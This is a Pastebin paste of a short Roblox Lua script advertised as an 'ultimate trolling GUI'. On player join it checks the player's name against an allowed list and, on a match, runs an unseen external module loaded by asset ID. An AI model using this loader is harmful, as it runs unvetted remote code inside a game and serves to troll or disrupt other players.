Advertisement
Guest User

ultimate trolling GUI (change the name in the "" to yours

a guest
Sep 21st, 2019
117
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. local allowed = {"skrillexbb123"}
  2.  
  3. game.Players.PlayerAdded:Connect(function(player)
  4. for i, v in pairs(allowed) do
  5. if player.Name == v then
  6. require(3397500272):Fire(player.Name)
  7. end
  8. end
  9. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement